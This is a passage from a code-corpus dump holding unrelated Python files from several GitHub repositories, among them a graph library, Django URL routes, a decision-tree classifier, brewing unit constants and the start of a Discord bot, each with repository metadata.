self._node_to_output_node_names = {\n k: sorted(v) for k,\n v in self._node_to_output_node_names.items()\n }\n\n # Make sure required nodes are in the graph\n for node_name in self._meta_graph_info.required_nodes:\n if node_name not in self._node_dict:\n raise ValueError(\"Required node {} not found in graph\".format(node_name))\n\n def __eq__(self, other_graph):\n node_dict = self.node_dict()\n other_node_dict = other_graph.node_dict()\n\n if set(node_dict.keys()) != set(other_node_dict.keys()):\n return False\n\n return all(node_dict[name] == other_node_dict[name] for name in node_dict)\n\n def _copy_node(self, node):\n node_copy = lgf_pb2.LNF()\n node_copy.CopyFrom(node)\n return node_copy\n\n def _copy_edge_info(self, edge_info):\n edge_info_copy = lgf_pb2.EdgeInfo()\n edge_info_copy.CopyFrom(edge_info)\n return edge_info_copy\n\n def _copy_meta_graph_info(self, meta_graph_info):\n meta_graph_info_copy = lgf_pb2.MetaGraphInfo()\n meta_graph_info_copy.CopyFrom(meta_graph_info)\n return meta_graph_info_copy\n\n def nodes(self):\n \"\"\"\n Returns a list of nodes in the graph\n Always in the same order as the nodes used to initialize this object\n \"\"\"\n return [self._copy_node(node) for node in self._nodes]\n\n def node_dict(self):\n return {node.name: node for node in self.nodes()}\n\n def get_node_by_name(self, node_name):\n \"\"\"Returns the node in the graph with the given node_name.\"\"\"\n return self._copy_node(self._node_dict[node_name])\n\n def has_node(self, node_name):\n \"\"\"Returns True if there is a node with the given name\"\"\"\n return node_name in self._node_dict\n\n def get_edge(self, name, port):\n \"\"\"Returns an edge in the graph with the given name and port\"\"\"\n return self._copy_edge_info(self._edge_dict[(name, port)])\n\n def input_edges(self):\n \"\"\"\n Returns a list of lgf_pb2.InputInfo() protobufs specifying the inputs of\n the graph. Always in the same order as the inputs used to initialize this object\n \"\"\"\n return [self._copy_edge_info(edge_info) for edge_info in self._input_edges]\n\n def output_edges(self):\n \"\"\"\n Returns a list of lgf_pb2.OutputInfo() protobufs specifying the outputs of\n the graph. 
Always in the same order as the outputs used to initialize this object\n \"\"\"\n return [self._copy_edge_info(edge_info) for edge_info in self._output_edges]\n\n def output_node_names(self):\n \"\"\"\n Returns a list of strings corresponding to output nodes of the graph\n \"\"\"\n return list(self._output_node_names)\n\n def get_input_node_names_of_node(self, node):\n \"\"\"\n Returns a list of the input node names of the given node\n \"\"\"\n return list(self._node_to_input_node_names[node.name])\n\n def get_output_node_names_of_node(self, node):\n \"\"\"\n Returns a list of the output node names of the given node\n \"\"\"\n return list(self._node_to_output_node_names[node.name])\n\n def meta_graph_info(self):\n \"\"\"\n Returns a lgf_pb2.MetaGraphInfo() protobuf\n \"\"\"\n return self._copy_meta_graph_info(self._meta_graph_info)\n\n def prune_graph(self,\n input_edges=None,\n output_edges=None,\n output_node_names=None,\n include_inputs=True):\n \"\"\"Returns a new light_graph object.\"\"\"\n # Inputs and outputs of pruned graph are the same\n input_edges = input_edges or self.input_edges()\n output_edges = output_edges or self.output_edges()\n output_node_names = output_node_names or self.output_node_names()\n\n # Node filter for input nodes\n input_node_filter = node_filters.and_filter(*[\n node_filters.not_filter(node_filters.name_is_filter(e.name))\n for e in input_edges\n ])\n\n # Get the root nodes for pruning, include required nodes\n root_nodes = [self.get_node_by_name(e.name) for e in output_edges] + [\n self.get_node_by_name(node_name) for node_name in output_node_names\n ] + [\n self.get_node_by_name(node_name)\n for node_name in self._meta_graph_info.required_nodes\n ]\n\n # Only keep nodes that the outputs depend on\n nodes = []\n node_names = set()\n for i, root_node in enumerate(root_nodes):\n # Do not use the input node filter for required nodes\n if i < (len(output_edges) + len(output_node_names)):\n node_filter = input_node_filter\n else:\n node_filter = None\n\n for node in self.bfs(root_node, node_filter=node_filter):\n if node.name not in node_names:\n nodes.append(node)\n node_names.add(node.name)\n\n # Make sure inputs and outputs come from the original graph\n input_edges = [self.get_edge(e.name, e.port) for e in input_edges]\n output_edges = [self.get_edge(e.name, e.port) for e in output_edges]\n\n # Add input nodes if necessary\n if include_inputs:\n for e in input_edges:\n if e.name in self._node_dict and e.name not in node_names:\n nodes.append(self._node_dict[e.name])\n node_names.add(e.name)\n\n return LightGraph(nodes,\n input_edges=input_edges,\n output_edges=output_edges,\n output_node_names=output_node_names,\n meta_graph_info=self.meta_graph_info())\n\n def bfs(self,\n root_node,\n bidirectional=False,\n node_filter=None,\n skip_control_inputs=False):\n \"\"\"\n Does a BFS on the graph starting at the root_node\n\n Params:\n root_node: starting node for the BFS\n bidirectional: If False, look at a nodes inputs when doing the BFS and\n discovering new nodes. If True do a bidirectional search, looking at\n a nodes inputs and outputs when discovering new nodes.\n node_filter: If provided, only add nodes to the frontier that match the\n filter with this graph. 
Note that if the root_node does not match the\n provided filter, no nodes will be returned.\n \"\"\"\n # Check for unsupported cases\n if bidirectional and skip_control_inputs:\n raise ValueError(\"Bidirectional BFS is currently unsupported when\" +\n \"skipping control inputs\")\n\n # Update node filter with defaults\n default_filter = node_filters.not_filter(\n node_filters.name_starts_with_filter(\"^\"))\n if node_filter is None:\n node_filter = default_filter\n else:\n node_filter = node_filters.and_filter(default_filter, node_filter)\n\n # Special case when the root_node does not match node_filter\n if not (node_filter.matches(root_node, self)):\n return []\n\n # BFS\n visited_node_names = {root_node.name}\n current_nodes = [root_node]\n frontier = []\n while current_nodes:\n for parent_node in current_nodes:\n yield self._copy_node(parent_node)\n\n # Default uses inputs for child nodes\n if skip_control_inputs:\n # Skip control inputs\n child_nodes = [\n self._node_dict[e.name]\n for e in parent_node.inputs\n if self.has_node(e.name)\n ]\n else:\n # Include control inputs\n child_nodes = [\n self._node_dict[n]\n for n in self._node_to_input_node_names[parent_node.name]\n ]\n\n # Bidirectional adds outputs as well, currently always includes\n # control inputs\n if bidirectional:\n child_nodes += [\n self._node_dict[n]\n for n in self._node_to_output_node_names[parent_node.name]\n ]\n\n for child_node in child_nodes:\n if (child_node.name not in visited_node_names\n and node_filter.matches(child_node,\n self)):\n visited_node_names.add(child_node.name)\n frontier.append(child_node)\n\n current_nodes = frontier\n frontier = []\n\n @staticmethod\n def _is_const(node):\n if node.HasField(lgf_pb2.LNF.original.DESCRIPTOR.name):\n return node.original.op in LightGraph.CONST_OPS\n else:\n return node.WhichOneof(\"node\") in LightGraph.CONST_NODES\n\n def is_constant_node(self, node):\n \"\"\"\n Check whether a node is constant.\n\n A node is constant provided all of its non-control incoming inputs come from\n constant nodes.\n If a node has no inputs and self._is_const(node) is False, it is defined to be\n a non-constant node.\n If a node is a control flow op, it is defined to be a non-constant node unless\n it is an Enter node with the attribute is_constant == True.\n \"\"\"\n # Traverse the subtree rooted at node, skipping control inputs\n for child_node in self.bfs(node, skip_control_inputs=True):\n # Control flow ops not constant\n if (child_node.HasField(lgf_pb2.LNF.original.DESCRIPTOR.name)\n and child_node.original.op in self.CONTROL_FLOW_OPS):\n # Exception for constant enter node\n if child_node.original.op == ops_pb2.ENTER and child_node.original.attr[\n self.IS_CONST_ATTR].b:\n continue\n\n return False\n\n # Found a leaf of the subtree if\n # 1) The node has no non-control inputs\n # 2) The node has a non-control input edge that does not come from\n # a node inside the graph (an input edge to the graph)\n if (not len(child_node.inputs)\n or any([not self.has_node(e.name) for e in child_node.inputs])):\n # Found a non-constant leaf in the subtree\n if not self._is_const(child_node):\n return False\n\n return True\n\n def as_lgf_pb(self):\n \"\"\"\n Returns the Lightelligence Graph Format (LGF) Protobuf corresponding to\n this graph\n \"\"\"\n lgf_pb = lgf_pb2.LGF()\n lgf_pb.nodes.extend(self.nodes())\n lgf_pb.input_edges.extend(self.input_edges())\n lgf_pb.output_edges.extend(self.output_edges())\n lgf_pb.output_node_names.extend(self.output_node_names())\n 
lgf_pb.meta_graph_info.CopyFrom(self.meta_graph_info())\n\n return lgf_pb\n\n @classmethod\n def lgf_pb_to_graph(cls, lgf_pb):\n \"\"\"Converts a LGF Proto to a LightGraph object\"\"\"\n return cls(list(lgf_pb.nodes),\n list(lgf_pb.input_edges),\n list(lgf_pb.output_edges),\n list(lgf_pb.output_node_names),\n meta_graph_info=lgf_pb.meta_graph_info)\n\n @staticmethod\n def read_lgf_pb(lgf_pb_path):\n \"\"\"Reads a LGF Proto from the binary file at lgf_pb_path\"\"\"\n light_graph = lgf_pb2.LGF()\n with open(lgf_pb_path, \"rb\") as f:\n light_graph.ParseFromString(f.read())\n\n return light_graph\n\n @staticmethod\n def write_lgf_pb(lgf_pb, lgf_pb_path):\n \"\"\"Writes lgf_pb as a binary file to lgf_pb_path\"\"\"\n with open(lgf_pb_path, \"wb\") as f:\n f.write(lgf_pb.SerializeToString())\n\n @staticmethod\n def from_pb(lgf_pb_path):\n return LightGraph.lgf_pb_to_graph(LightGraph.read_lgf_pb(lgf_pb_path))\n\n\nclass MutableLightGraph(LightGraph):\n\n def get_node_by_name(self, node_name):\n \"\"\"Returns the node in the graph with the given node_name.\"\"\"\n return self._node_dict[node_name]\n","repo_name":"HermanYang/SDKDocs","sub_path":"lt_sdk/graph/lgf_graph.py","file_name":"lgf_graph.py","file_ext":"py","file_size_in_byte":15592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"45241471790","text":"from django.contrib import admin\r\nfrom django.urls import path,include\r\nfrom . import views\r\nfrom django.contrib.auth import views as auth_views\r\nfrom django.views.generic.base import RedirectView\r\n\r\nfrom django.conf import settings\r\nfrom django.conf.urls.static import static\r\n\r\nurlpatterns = [\r\n path('admin_home',views.home, name=\"home-page\"),\r\n path('login',views.login_view,name='login-page'),\r\n path('register',views.userregister,name='register-page'),\r\n path('save_register',views.save_register,name='register-user'),\r\n path('user_login',views.login_user,name='login-user'),\r\n path('home',views.home,name='home-page'),\r\n path('logout',views.logout_user,name='logout'),\r\n path('profile',views.profile,name='profile-page'),\r\n path('update_password',views.update_password,name='update-password'),\r\n path('update_profile',views.update_profile,name='update-profile'),\r\n path('users',views.users,name='user-page'),\r\n path('manage_user',views.manage_user,name='manage-user'),\r\n path('manage_user/',views.manage_user,name='manage-user-pk'),\r\n path('save_user',views.save_user,name='save-user'),\r\n path('delete_user/',views.delete_user,name='delete-user'),\r\n path('category',views.category,name='category-page'),\r\n path('manage_category',views.manage_category,name='manage-category'),\r\n path('manage_category/',views.manage_category,name='manage-category-pk'),\r\n path('view_category/',views.view_category,name='view-category-pk'),\r\n path('save_category',views.save_category,name='save-category'),\r\n path('delete_category/',views.delete_category,name='delete-category'),\r\n path('sub_category',views.sub_category,name='sub_category-page'),\r\n path('manage_sub_category',views.manage_sub_category,name='manage-sub_category'),\r\n path('manage_sub_category/',views.manage_sub_category,name='manage-sub_category-pk'),\r\n path('view_sub_category/',views.view_sub_category,name='view-sub_category-pk'),\r\n path('save_sub_category',views.save_sub_category,name='save-sub_category'),\r\n path('delete_sub_category/',views.delete_sub_category,name='delete-sub_category'),\r\n 
path('books',views.books,name='book-page'),\r\n path('manage_book',views.manage_book,name='manage-book'),\r\n path('manage_book/',views.manage_book,name='manage-book-pk'),\r\n path('view_book/',views.view_book,name='view-book-pk'),\r\n path('save_book',views.save_book,name='save-book'),\r\n path('delete_book/',views.delete_book,name='delete-book'),\r\n path('members',views.members,name='member-page'),\r\n path('manage_member',views.manage_member,name='manage-member'),\r\n path('manage_member/',views.manage_member,name='manage-member-pk'),\r\n path('view_member/',views.view_member,name='view-member-pk'),\r\n path('save_member',views.save_member,name='save-member'),\r\n path('delete_member/',views.delete_member,name='delete-member'),\r\n path('borrows',views.borrows,name='borrow-page'),\r\n path('manage_borrow',views.manage_borrow,name='manage-borrow'),\r\n path('manage_borrow/',views.manage_borrow,name='manage-borrow-pk'),\r\n path('view_borrow/',views.view_borrow,name='view-borrow-pk'),\r\n path('save_borrow',views.save_borrow,name='save-borrow'),\r\n path('delete_borrow/',views.delete_borrow,name='delete-borrow'),\r\n path(\"view_issued_book/\", views.view_issued_book, name=\"view_issued_book\"),\r\n\r\n ####chats\r\n path('ucchat/', views.UCreateChat.as_view(), name='ucchat'),\r\n path('ulchat/', views.UListChat.as_view(), name='ulchat'),\r\n \r\n path('acchat/', views.ACreateChat.as_view(), name='acchat'),\r\n path('alchat/', views.AListChat.as_view(), name='alchat'),\r\n\r\n\r\n path('Memberregister/',views.Memberregister, name='member_register'),\r\n\r\n\r\n\r\n\r\n #members\r\n path('',views.members_home,name=\"members-home\"),\r\n path('signup/', views.members_register, name='signup'),\r\n path('members_home',views.members_homepage,name=\"members-homepage\"),\r\n path('member_borrow',views.memberborrow,name='member-borrow-page'),\r\n path('member_details',views.MemberDetails_save,name=\"MemberDetails-save\"),\r\n path('view/',views.ViewMember,name='viewmember'),\r\n path('members_book_page',views.members_bookpage,name=\"members-book-page\"),\r\n path('transactions',views.Transaction,name=\"transaction\"),\r\n path('manage_transaction',views.manage_transaction,name='manage-transaction'),\r\n path('manage_transaction/',views.manage_transaction,name='manage-transaction-pk'),\r\n # path('view_transaction/',views.Transaction,name='view-transaction-pk'),\r\n path('save_transaction',views.save_transaction,name='save-transaction'),\r\n path('delete_transaction/',views.delete_transaction,name='delete-transaction'),\r\n path('fines',views.memberfine,name='fines'),\r\n path('collections',views.collections,name=\"collection\"),\r\n path('bookinfo',views.BookInfo,name=\"bookinfo\"),\r\n path(\"issued_books/\", views.issued_books, name=\"issued_books\"),\r\n\r\n\r\n\r\n\r\n]+ static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT)\r\n","repo_name":"ericdev-202/library","sub_path":"django_lms/lmsApp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":5181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"71374557768","text":"# extract *all* labels from project gutenberg\n\nfrom gutenberg.query import get_metadata\n\n# when running this code for the first time, you have to create a cache of the meta data. 
This may take some time\n# (according to the author of the package - compare https://pypi.org/project/Gutenberg/ -, it took 18hrs on his machine,\n# on mine it was less than 4 - I didn't check earlier, because I expected it would be around 18 as well.\n#\n# from gutenberg.acquire import get_metadata_cache\n#\n# cache = get_metadata_cache()\n# cache.populate()\n\n# list supported types of metadata\n# from gutenberg.query import list_supported_metadatas\n# print(list_supported_metadatas())\n\nresults = {}\n\nfor i in range(1, 57700):\n try:\n if get_metadata('language', i) == frozenset({'en'}):\n print(i)\n labels = get_metadata('subject', i)\n results[i] = labels\n except:\n print(\"extracting labels: Error at index \" + str(i) + \" probably no file with id \" + str(i) + \" was found. Skipped.\")\n with open(\"./log/label_extraction.txt\", 'a+') as logfile:\n logfile.write(\"extracting labels: Error at index \" + str(i) + \" probably no file with id \" + str(i) + \" was found. Skipped.\\n\")\n\npath = \"../data/labels.txt\"\nwith open(path, \"w\") as file:\n file.write(str(results))\n","repo_name":"Berndinio/AML_project","sub_path":"scripts/extract_labels.py","file_name":"extract_labels.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"3780340485","text":"\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n\nclass DecisionTree(object):\n \"\"\"Decision Tree.\n\n Implements the base class from which `ClassificationTree` and\n `RegressionTree` are built upon. All the functionality is defined in the\n base class `DecisionTree` except for evaluating a split and checking if a\n Leaf has been reached.\n\n Parameters\n ----------\n max_depth : int or None\n The maximum depth of the tree.\n \"\"\"\n def __init__(self, max_depth=None):\n self.max_depth = max_depth\n\n def fit(self, X, y):\n \"\"\"Fit a decision tree model to the data.\n\n Parameters\n ----------\n X : ndarray\n A matrix with the training data.\n y : ndarray\n A column vector with the true target values.\n\n Returns\n self\n \"\"\"\n self.root = self.partition(X, y)\n return self\n\n def predict(self, X, y=None):\n \"\"\"Predict the target for a data row `X`.\n\n Parameters\n ----------\n X : ndarray\n A data row of shape (n_features,).\n\n Returns\n -------\n pred : float or int\n Prediction for the data row `X`.\n \"\"\"\n pred = np.zeros(shape=(X.shape[0], 1))\n for i in range(X.shape[0]):\n pred[i] = self.traverse(X[i, :], self.root)\n return pred\n\n def traverse(self, X, node):\n \"\"\"Traverse the tree.\n\n Parameter\n ---------\n X : ndarray\n A single row of data.\n node: TreeNode instance\n The node should be the root of the tree.\n\n Returns\n -------\n pred : float\n The prediction for row `X`.\n \"\"\"\n if isinstance(node, Leaf):\n return node.pred\n if X[node.feature] <= node.split_val:\n return self.traverse(X, node.left_child)\n else:\n return self.traverse(X, node.right_child)\n\n def partition(self, X, y, depth=0):\n \"\"\"Partition the data.\n\n Parameters\n ----------\n X : ndarray\n A matrix with the data.\n y : ndarray\n A column vector with the true target values.\n depth : int\n The maximum depth of the tree to grow.\n\n Returns\n -------\n node : TreeNode instance\n A node which represents the root of the fitted tree.\n \"\"\"\n check = self.check_partition(y, depth)\n if isinstance(check, Leaf):\n return check\n\n feature, split_val = self.find_feature(X, y)\n X_left = X[X[:, 
feature] <= split_val]\n X_right = X[X[:, feature] > split_val]\n y_left = y[X[:, feature] <= split_val]\n y_right = y[X[:, feature] > split_val]\n\n node = TreeNode(feature, split_val, self.partition(X_left, y_left, depth+1),\n self.partition(X_right, y_right, depth+1))\n return node\n\n def find_feature(self, X, y):\n \"\"\"Find a feature to split.\n\n Parameters\n ----------\n X : ndarray\n y : ndarray\n\n Returns\n -------\n best_feature : int\n The index of the best feature to split.\n best_split : float\n The best value to split at.\n \"\"\"\n cost_low = np.inf\n best_feature = None\n best_split = None\n for i in range(X.shape[1]):\n cost, split_val = self.find_split(X[:, i], y)\n if cost < cost_low:\n best_feature = i\n best_split = split_val\n cost_low = cost\n return best_feature, best_split\n\n def find_split(self, feature, y):\n \"\"\"Find best split.\n\n Find the best split given the values for the provided feature.\n\n Parameters\n ----------\n feature : ndarray\n An column vector with the values for one feature. Should be of\n shape (m,).\n y : ndarray\n A column vector with the true labels for the column vector\n `feature`. Should be of shape (m,).\n\n Returns\n -------\n cost_low : float\n The lowest cost that can be achieved by splitting the feature at\n the value `best_split`.\n best_split : float\n The value in `feature` which is the best split, i.e. the split that\n minimize the cost.\n \"\"\"\n idx_sorted = np.argsort(feature)\n feature = feature[idx_sorted]\n y = y[idx_sorted]\n cost_low = np.inf\n best_split = None\n for v in np.unique(feature)[:-1]:\n r1 = y[feature <= v]\n r2 = y[feature > v]\n cost = self.eval_split(r1, r2)\n if cost < cost_low:\n cost_low = cost\n next_val = feature[feature > v][0]\n best_split = (v + next_val) / 2\n return cost_low, best_split\n\n def eval_split(self, r1, r2):\n raise NotImplementedError\n\n def check_partition(self, y, depth):\n raise NotImplementedError\n\n\nclass ClassificationTree(DecisionTree):\n \"\"\"Classification tree.\n\n Implements decision tree which can be used for classification. It is built\n on the class `DecisionTree` with the only addition is to compute the cost\n function when deciding splits.\n\n Parameters\n ----------\n impurity_measure : {'gini', 'entropy'}\n Defines which impurity measure which should be used when fitting the\n tree.\n max_depth : int or None\n The maximum depth of the tree.\n \"\"\"\n def __init__(self, impurity_measure='gini', max_depth=None):\n self.impurity_measure = impurity_measure\n super().__init__(max_depth=max_depth)\n\n def check_partition(self, y, depth):\n \"\"\"Check if `y` only contains one class or if the maximum depth is\n reached.\n\n Parameters\n ----------\n y : ndarray\n An array with class labels.\n depth : int\n The maximum depth of the tree.\n\n Returns\n -------\n check : Leaf instance or None\n A Leaf instance is returned if either `y` only contains one class\n label or if the maximum depth of the tree is reached. Otherwise,\n None is returned.\n \"\"\"\n (y_unique, counts) = np.unique(y, return_counts=True)\n\n if len(y_unique) == 1:\n return Leaf(y_unique)\n\n if self.max_depth is None:\n return None\n elif depth >= self.max_depth:\n idx = np.argmax(counts)\n val = y_unique[idx]\n return Leaf(val)\n else:\n return None\n\n def eval_split(self, y_left, y_right):\n \"\"\"Evaluate a candidate split.\n\n y_left : ndarray\n The true target value for one of the two partitions. 
Should be of\n shape (n_left,).\n y_right : ndarray\n The true target value for one of the two partitions. Should be of\n shape (n_right,).\n\n Returns\n -------\n float\n The value of the impurity measure for the given split.\n \"\"\"\n p_left = np.mean(y_left, keepdims=True)\n p_right = np.mean(y_right, keepdims=True)\n if self.impurity_measure == 'gini':\n c_left = gini(p_left)\n c_right = gini(p_right)\n else:\n c_left = enropy(p_left)\n c_right = enropy(p_right)\n n_left = y_left.shape[0]\n n_right = y_right.shape[0]\n n = n_left + n_right\n return (n_left / n) * c_left + (n_right / n) * c_right\n\n def plot_boundaries(self, X, y):\n plt.figure()\n sns.scatterplot(x=X[:, 0], y=X[:, 1], hue=y, style=y, legend=None)\n\n def plot_node(node):\n if isinstance(node, TreeNode):\n if node.feature == 0:\n plt.axvline(x=node.split_val, color='r')\n else:\n plt.axhline(y=node.split_val, color='r')\n plot_node(node.right_child)\n plot_node(node.left_child)\n\n plot_node(self.root)\n plt.show()\n\n\ndef gini(p):\n return 2 * p * (1 - p)\n\n\ndef enropy(p):\n return - (p * np.log(p) + (1 - p) * np.log(1 - p))\n\n\nclass TreeNode(object):\n \"\"\"\n This implements a node in a tree which is not a leaf. It is used to store\n information about which feature to split and at which value.\n\n Attributes\n ----------\n feature : int\n split_val : float\n left_child : TreeNode instance or Leaf instance\n right_child : TreeNode instance or Leaf instance\n \"\"\"\n def __init__(self, feature, split_val, left_child, right_child):\n self.feature = feature\n self.split_val = split_val\n self.left_child = left_child\n self.right_child = right_child\n\n\nclass Leaf(object):\n \"\"\"Leaf node.\n\n This implements a leaf node in a tree which is used to store predictions.\n\n Attributes\n ----------\n pred : int\n The predicted label for an observation which ends up in this leaf.\n \"\"\"\n def __init__(self, pred):\n self.pred = int(pred)\n","repo_name":"franslarsson/ml-algo","sub_path":"tree_models/decision_tree.py","file_name":"decision_tree.py","file_ext":"py","file_size_in_byte":9090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"392729248","text":"from pyspark.sql.dataframe import DataFrame\nfrom dataquality_bnr.dqSupport import main as dqSup\n\ndef getDataframe(spark, inputData):\n print(\"getDataframe...\")\n \n df=None\n \n if type(inputData) == DataFrame:\n df=inputData\n elif type(inputData) == str:\n inputDataYaml = inputData\n df = dqSup.getDataframe(spark, yaml_path=inputDataYaml)\n \n return df","repo_name":"brunoRenzo6/Spark-DataQuality","sub_path":"dataquality-bnr/dataquality_bnr/yamlHandler/inputData.py","file_name":"inputData.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"6866090504","text":"gramsperounce\t= 28.349523\ngramsperpound\t= 16 * gramsperounce\nlitersperquart\t= 0.94635295\nliterspergallon\t= 4 * litersperquart\ngallonsperbarrel= 31\n\t\t # tbsp * cup * quart * gallon\ntsppergallon\t= 3 * 16 * 4 * 4\n\t\t # quart * gallon\ncupspergallon\t= 4 * 4\n\npascalsperbar\t= 100000\npascalsperatm\t= 101325\npascalsperpsi\t= 6894.75729\n\nabsolute_zero_c\t= -273.15\n\nebcpersrm\t= 1.97\n\n# g/l of co2 at stp\nco2_stp_gl\t= 1.977\n\n# in case the maltster doesn't report a fine-coarse difference, use 1.5%\nfine_coarse_diff= 1.5\n\n# need this much conversion power in the entire recipe (WK)\nminconversion\t= 94\n\n# hop absorption, 
milliliter of wort per gram of hops\npellethop_absorption_mlg = 6\nleafhop_absorption_mlg = 10\n\n# specific volume of grains in l/kg.\n#\n# don't remember where I pulled this figure from, so should\n# check accuracy of it some day.\ngrain_specificvolume = 0.7\n\n# hop densities, via http://www.ebc2017.com/inhalt/uploads/P023_Schuell.pdf\n# used for calculating hops volumes to that we know how much wort fits\n# into the keg. frankly, the volume are so small that it doesn't matter\n# that much, but let's do it just to accommodate for the pathological\n# \"500g leaf hops in a 5gal keg\" case.\n#\n# Also, I'm not sure those values are for the density of the *hops*, not\n# the packaging. need to measure for myself. Just use these numbers\n# for now.\n#\n# in kg/m3 (or g/l)\npellethop_density_gl = 500\nleafhop_density_gl = 135\n\ndatefmt=\"%a %d %b %Y\"\n","repo_name":"anttikantee/wbc","sub_path":"WBC/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"16"} +{"seq_id":"19392500528","text":"# Problem to Solve: What if we need the length of the words separated by a space to be added at the end of that same word and have it returned as an array?\n\n# Examples:\n# \"apple ban\" --> [\"apple 5\", \"ban 3\"]\n# \"you will win\" -->[\"you 3\", \"will 4\", \"win 3\"] \n\n# 1. Determine length of each string\n# 2. Add lenth immediately after each string\n\n# Split single string into list of individuals\n# Loop through list counting each individual string's length.\n# concatenate string with its length Inter \n\n\nstr_1 = \"you will win\"\nstr_2 = \"\"\n\ndef add_length(str_):\n \n lslist = []\n split_string = str_.split()\n for x in split_string:\n l = len(x)\n lslist.append(x + ' ' + str(l))\n \n return lslist\n\n\n\n\n\nprint(add_length(str_1))","repo_name":"JACedwards/Code_Wars_Solutions","sub_path":"Add_Length.py","file_name":"Add_Length.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"22080687556","text":"import multiprocessing as mp\nimport time\n\ndef f(name):\n count = 0\n while True: \n print('hello ', name, \"count: \", count)\n count += 1\n time.sleep(1)\n\nif __name__ == '__main__':\n p = mp.Process(target=f, args=('bob',))\n p.start()\n print(\"main process going to sleep\")\n time.sleep(5)\n p2 = mp.Process(target=f, args=('paulo',))\n p2.start()\n print(\"main process going to sleep again\")\n time.sleep(5) \n c = 0\n while True:\n print(\"main\")\n time.sleep(1)\n c += 1\n if c == 10:\n print(\"matar processing\")\n p.terminate()\n","repo_name":"ppereiradev/fault-injector","sub_path":"testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"34487763794","text":"import sys\nimport functions.link_handler as lh\n\ndef main():\n if not sys.argv[1]:\n print(\"Did not get an URL, please give one\")\n exit\n \n url = sys.argv[1]\n \n print(f\"Starting to gather URLS from {url}\")\n\n links = lh.gather_links_from_url(url)\n\nif __name__ == \"__main__\":\n main()","repo_name":"MichaelNirkman/web-mash","sub_path":"webmash.py","file_name":"webmash.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70651874887","text":"import asyncio\nimport 
nextcord as discord\nimport os\nimport pickle\nimport requests\nimport sys\nfrom nextcord.ext import commands\nfrom random import randint\nfrom time import sleep\nfrom typing import Optional, Union, Dict, Set, Tuple\ntry:\n from open_digraph import *\nexcept ImportError:\n from .open_digraph import *\n\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n\n# CONSTANTES ###################################################################\nfrom constantes import ADMINS, TOKEN, prefixeBot\nfrom utils import stockePID, cheminOutputs\nChannelID = Tuple[int, int] #tuple qui contient l'id du salon et l'id du serveur\nMessage = int #l'id du message\nclass Groupe(OpenDigraph):\n def __init__(self):\n super().__init__([], [], [])\n self.originaux: Dict[Message, Message] = dict() #associe à une copie le message original\n self.copies: Dict[Message, Set[Message]] = dict() #associe à un original la liste de ses copies\n self.copiesGuild: Dict[Tuple[Message, ChannelID], Message] = dict() #associe à un message son pendant sur un autre salon\n self.auteur: Dict[Message, str] = dict() #associe à un message le pseudo de son auteur\n\n def salonInGroupe(self: 'Groupe', channelId: ChannelID) -> bool:\n return any(x.getLabel() == channelId for x in self.getNodes())\n def addChannel(self: 'Groupe', channelId: ChannelID) -> None:\n autresNodes = self.getNodeIds()\n self.addNode(channelId, autresNodes, autresNodes)\n def remChannel(self: 'Groupe', channelId: ChannelID) -> None:\n for idNode, node in self.nodes.items():\n if node.getLabel() == channelId:\n self.removeNodeById(idNode)\n def getNodeChannel(self: 'Groupe', channelId: ChannelID) -> Optional[Node]:\n for node in self.getNodes():\n if node.getLabel() == channelId:\n return node\n\n def autresSalons(self: 'Groupe', channelId: ChannelID) -> Set[ChannelID]:\n nodeChannel = self.getNodeChannel(channelId)\n return {self.nodes[idChild].getLabel() for idChild in nodeChannel.getChildrenIds()}\n\n def ajoutMsg(self: 'Groupe', idOriginal: Message, idCopie: Message, channelIdOriginal: ChannelID, channelIdCopie: ChannelID, auteur: str) -> None:\n self.originaux[idCopie] = (idOriginal, channelIdOriginal)\n self.copiesGuild[idCopie, channelIdOriginal] = idOriginal\n self.copiesGuild[idOriginal, channelIdCopie] = idCopie\n self.auteur[idOriginal] = auteur\n self.auteur[idCopie] = auteur\n\n if idOriginal not in self.copies:\n self.copies[idOriginal] = {(idCopie, channelIdCopie)}\n else:\n self.copies[idOriginal].add((idCopie, channelIdCopie))\n\n def copiesMessage(self: 'Groupe', idMsg: Message) -> Set[Tuple[Message, ChannelID]]:\n if idMsg in self.copies: #idMsg est un message original, c'est facile de retrouver ses copies\n return self.copies[idMsg]\n else: #idMsg est une copie par le bot, il faut retrouver l'original et les copies de l'original - idMsg\n original = self.originaux[idMsg]\n return {original} | {x for x in self.copies[original] if x[0] != idMsg}\n def copieDansSalon(self: 'Groupe', idMsg: Message, channelId: ChannelID) -> Optional[Message]:\n if (idMsg, channelId) in self.copiesGuild: #ça ne marche que si idMsg est le message original\n return self.copiesGuild[idMsg, channelId]\n else: #sinon, il faut retrouver l'original\n msgOriginal, channelOriginal = self.originaux[idMsg]\n #par construction le truc suivant existe forcément\n return self.copiesGuild[msgOriginal, channelId]\n def auteurMsg(self: 'Groupe', idMsg: Message) -> str:\n return self.auteur[idMsg]\n\nstockePID()\n\n#on récupère les constantes dans le 
